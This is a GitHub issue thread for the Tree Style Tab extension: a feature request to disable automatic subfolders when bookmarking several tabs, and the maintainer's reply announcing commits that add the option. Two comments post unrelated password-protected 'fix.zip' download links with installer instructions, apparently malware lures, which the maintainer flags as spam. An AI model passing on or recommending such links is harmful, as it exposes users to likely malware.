### ISSUE TITLE
[Feature Request] Add option to disable automatic creation of subfolder when bookmarking multiple tabs

### ISSUE THREAD

**Issue by cheatreal321** [piroor/treestyletab#3620]
## Abstract
Basically what the title says. I often bookmark multiple tabs at once and do so into an already existing structure of bookmark folders. Having to drag and drop tabs out of the subfolder that TST automatically creates when more than one tab is bookmarked is very tedious. I'd love an option to be able to disable that.

## Steps to see the situation
 1. Select multiple tabs in TST (e.g. by clicking on multiple tabs while holding Shift or Ctrl)
 2. Right-click tabs and then choose "Bookmark Selected Tabs"
 3. Choose any location for the bookmarks to go
 4. Navigate to chosen location to see that the bookmarks ended up in a subfolder inside the location

The outcome is the same when dragging and dropping the selected bookmarks to the toolbar or bookmark menu.

## Desired result
Allow users to bookmark multiple tabs at once without always creating a subfolder, ideally via a toggle in the options.
## Actual (present) result
As described above, bookmarking multiple tabs by any method always causes them to be put into a new bookmark folder.

## Environment

 * Platform (OS): Windows 10 64 bit IoT Enterprise LTSC
 * Version of Firefox: 129.0.1
 * Version (or revision) of Tree Style Tab: 4.0.22

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by piroor** [comment]
Note: I've deleted two comments looked like spam. Please comment again with detailed descriptions if they were not spam.
![image](https://github.com/user-attachments/assets/1ae2f56d-4a6e-43c1-a1ea-264f824cb045)

**Comment by piroor** [comment]
OK I've added ability to control the auto-grouping behavior for bookmarks from tabs.
Moreover, the auto-grouping is generally suppressed when dropped tabs are not tree items or they are saved into a blank folder.

https://github.com/piroor/treestyletab/commit/c254a56d3fb56eebbb9158e93b0bed3f5c77b404
https://github.com/piroor/treestyletab/commit/ad649188c64d40169ef90db1045bce2c0c911fb3
https://github.com/piroor/treestyletab/commit/dfd20a44b26ebc20be31e8ec480d0e5ec3ed2c34
https://github.com/piroor/treestyletab/commit/72943e9a2bffc797c0110c50ad1d289355c5d9d7
https://github.com/piroor/treestyletab/commit/ca245811c3c09f1593357b2036ba30809a0a6c47
